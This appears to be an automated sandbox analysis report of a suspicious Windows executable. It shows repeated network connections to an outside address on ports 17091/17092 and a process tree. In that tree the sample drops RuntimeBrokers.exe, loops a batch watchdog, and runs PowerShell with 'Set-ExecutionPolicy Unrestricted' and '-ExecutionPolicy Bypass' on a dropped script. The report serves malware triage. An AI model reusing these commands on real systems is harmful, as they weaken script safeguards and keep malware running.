                                                              Dec 22, 2024 09:51:13.524044991 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:13.524132967 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:13.877410889 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:13.877572060 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:13.878763914 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:13.879110098 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:14.281402111 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:24.589756966 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:24.589756966 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:24.942635059 CET170914978043.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:24.942786932 CET4978017091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:26.526859045 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:26.884470940 CET170924978143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:26.884751081 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:31.467014074 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:31.467046976 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:31.824820995 CET170924978143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:31.824876070 CET170924978143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:31.826078892 CET170924978143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:31.826363087 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:32.233422995 CET170924978143.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:42.507555008 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:42.507555008 CET4978117092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:44.444770098 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:44.798413038 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:44.798660994 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:49.393038034 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:49.393090010 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:49.746954918 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:49.748888969 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:51:49.749186039 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:51:50.152611017 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:00.425478935 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:00.779074907 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:00.809937000 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:01.212841988 CET170914978243.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:16.047032118 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:16.047032118 CET4978217091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:17.984216928 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:18.335170984 CET170924978343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:18.335345030 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:22.928016901 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:22.928070068 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:23.279094934 CET170924978343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:23.280786037 CET170924978343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:23.281224012 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:23.681416035 CET170924978343.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:33.964926958 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:33.964926958 CET4978317092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:35.902209044 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:36.247704029 CET170914978443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:36.247937918 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:40.837028980 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:40.837080002 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:41.182329893 CET170914978443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:41.182431936 CET170914978443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:41.184304953 CET170914978443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:41.184555054 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:41.579391003 CET170914978443.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:51.867305040 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:51.867305994 CET4978417091192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:53.804536104 CET4978517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:54.161708117 CET170924978543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:54.161886930 CET4978517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:58.765280008 CET4978517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:58.765341043 CET4978517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:59.122517109 CET170924978543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:59.122560024 CET170924978543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:59.123188972 CET170924978543.250.172.42192.168.11.20
                                                              Dec 22, 2024 09:52:59.123538017 CET4978517092192.168.11.2043.250.172.42
                                                              Dec 22, 2024 09:52:59.530186892 CET170924978543.250.172.42192.168.11.20

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:03:44:32
                                                              Start date:22/12/2024
                                                              Path:C:\Users\user\Desktop\Fqae7BLq4m.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\Fqae7BLq4m.exe"
                                                              Imagebase:0x400000
                                                              File size:70'322'189 bytes
                                                              MD5 hash:A994F2B3B899758BDDF5F35E407A694D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:03:44:40
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:03:44:40
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:03:44:40
                                                              Start date:22/12/2024
                                                              Path:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
                                                              Imagebase:0xc70000
                                                              File size:777'816 bytes
                                                              MD5 hash:30A274E00DA842B09E9763F19777ADED
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 5%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:5
                                                              Start time:03:45:50
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:6
                                                              Start time:03:45:50
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:7
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:8
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:9
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:10
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                              Imagebase:0xdc0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6cf510000
                                                              File size:875'008 bytes
                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:13
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                              Imagebase:0xd40000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:14
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                              Imagebase:0xd40000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:15
                                                              Start time:03:45:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:16
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:17
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:18
                                                              Start time:03:46:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:19
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:03:46:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:03:47:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:03:47:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:29
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:03:48:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:32
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:03:48:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:35
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:36
                                                              Start time:03:49:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x7ff68df70000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:37
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:38
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:39
                                                              Start time:03:49:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:40
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:41
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:42
                                                              Start time:03:50:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:43
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:44
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:45
                                                              Start time:03:50:51
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 30 /nobreak
                                                              Imagebase:0x980000
                                                              File size:25'088 bytes
                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:46
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
                                                              Imagebase:0x4b0000
                                                              File size:79'360 bytes
                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:47
                                                              Start time:03:51:21
                                                              Start date:22/12/2024
                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:findstr /I "RuntimeBrokers.exe"
                                                              Imagebase:0x790000
                                                              File size:29'696 bytes
                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
